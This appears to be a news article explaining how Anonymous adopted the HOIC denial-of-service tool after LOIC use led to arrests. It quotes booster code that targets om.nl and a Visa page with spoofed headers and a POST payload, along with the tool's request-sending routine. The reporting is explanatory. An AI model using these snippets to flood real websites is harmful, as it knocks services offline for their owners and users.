Most members of Anonymous would prefer to stay, well, anonymous. But as the group has engaged in increasingly high-profile attacks on government and corporate websites, doing so effectively and staying out of harm's way have become an ever-growing challenge. To protect itself, the group has altered its tactics over the past year to both increase the firepower of its attacks and shield members from the prying eyes of law enforcement.

In late 2011, members of Anonymous began to step away from their most well-known weapon for distributed denial of service attacks. While some in the group continued to try to get enthusiastic followers (or unwary webpage visitors) to use a Web browser version of the Low Orbit Ion Cannon attack tool, use of LOIC had led to the arrests of members of Anonymous and LulzSec last summer. More cautious and technically skilled Anons started to use a collection of other tools and security practices to both step up attacks and hide themselves from being tracked. A message spread through Anonymous’ IRC channels spells it out: “Do NOT use LOIC.”

How Denial of Service attacks work Denial-of-service (DoS) attacks are aimed at blocking access by outside users to a website or other Internet service. They usually do this by either overwhelming one or more of the resources of the server that hosts the website or application with traffic, or by disrupting a network service that the server depends on. The most common of these are "flood" brute-force attacks that aim to overwhelm a server's network connections with a huge volume of requests, consuming the network bandwidth of the server's connection, or filling up the memory associated with the server application's network connections, rendering them unreachable. Other types of attacks are crafted to go after the applications themselves, and use specially formed network requests to a server to exploit a function of its software to crash it or make it stop responding. A distributed denial of service (DDoS) attack spreads the malicious requests to the server across many source computers—often by using a "botnet" controlling hundreds of infected computers, or in the case of Anonymous, by coordinating the efforts of tens or hundreds of volunteer "activists" to launch attacks.

The attacks on the websites of the Justice Department and others in the wake of the takedown of Megaupload.com were the first demonstration of the power of LOIC’s successor—a DDoS tool called the High Orbit Ion Cannon.

HOIC isn't exactly rocket science. At its core, it is essentially a simple script for launching HTTP POST and GET requests at a targeted server, wrapped in a "lulz" friendly graphical interface. According to the documentation, it can be used to open up 256 attack sessions simultaneously—either targeting a single server, or going after multiple targets. The user can control the number of threads used per attack.

This rocket needs boosters

The code itself isn't that sophisticated. HOIC is written in Basic—or, to be more accurate, Real Software's Real Basic, the cross-platform version of the language originally developed for the Mac. The main power of HOIC is that it can be customized for each attack target relatively easily without having to know how to code, using "boosters," modules with additional bits of Basic code that are interpreted at runtime.

HOIC’s boosters are used to tailor the HTTP requests sent by HOIC to the target for a specific type of attack. ”HOIC is pretty useless,” the documentation file that comes with the code says, “unless it is used in combination with ‘Boosters.’” And that's putting it mildly—the attack code is generated based completely on what's in the booster file. When an attack is launched, HOIC compiles the booster to create the HTTP headers to be sent, and sets the mode of the attack.

One approach commonly used in boosters is to create randomized requests in an attempt to defeat any content delivery network (CDN) or caching used to shield the server from traffic spikes. Some boosters use lists of URLs within a target site, appending them to a table in memory to be used by the attack thread:

// populate rotating urls randURLs.Append "http://www.om.nl/" randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"

The script also can include a randomized list of user agents, referring sites and random headers that are fed into HTTP requests to make the requests look more legitimate:

useragents.Append " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" useragents.Append " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" referers.Append " http://www.google.com/?q=" +URL

The booster script can also include parameters to set the volume of the attack, and to switch between GET and POST requests. For example, here’s the booster set up to attack a dynamic part of Visa’s webpage, using POST, complete with a form submission to the target page:

UsePost = true Headers.Append(" User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Firefox/3.6.12" ) Headers.Append(" Keep-Alive: 115") Headers.Append("Proxy-Connection: keep-alive") Headers.Append(" Referer: http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do") Headers.Append(" Cookie: JSESSIONID=5D2E604F487FB5AC9DBF9A1FDEA7D86A.fta-web3" ) URL = "http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do" PostBuffer = "newSearch=true&airport=&pageid=adv&filteredNameSubmit=false&LOC=en_US&country=CHE&street1=2353464756867867876886786777777777777777777777777777786&building=&city=aaaaaaaaaaaaaaa&initialSearchName=&mapAndList=mapAndList&x=27&y=9"

While the scripts themselves can get fairly sophisticated in how they’re configured, a generic booster file distributed with HOIC makes it fairly simple for would-be DDoSers to build a custom booster for their target of ire of the moment and distribute it via a shared document site like PasteBin, Google Documents, or an Etherpad site. For example, when a hungry Anon got upset about a late pizza delivery on Valentine’s Day, he quickly shared a clip of Web addresses to start an impromptu DDoS on Pizza Hut.

The actual code that runs the attacks is executed as threads by a set of timers. ObjTarget.SendAttack is pretty straightforward:

'Creating the socket request Dim httpObj as HTTPSocket Dim i as integer Dim reqSize as integer = 0 httpObj = New HTTPSocket ' Adding the headers generated by the booster for i = 0 to Headers.Ubound reqSize = reqSize + Headers(i).Len httpObj.SetRequestHeader(Headers(i).Left(Headers(i).InStr(":")-1), Headers(i).Mid(Headers(i).InStr(":")+1, Headers(i).Len - Headers(i).InStr(":"))) Next 'For attacks wher POST has been chosen as the type of HTTP request if(UsePost) then reqSize = reqSize + PostBuffer.Len + 4 ' POST httpObj.SetPostContent(PostBuffer, "application/x-www-form-urlencoded") httpobj.Post URL 'For GET based attacks else reqSize = reqSize + 3 ' GET httpobj.Get URL end if 'Tracking how much data has been sent to the target TotalBytesSent = TotalBytesSent + reqSize

But HOIC isn’t the only tool that Anons are promoting.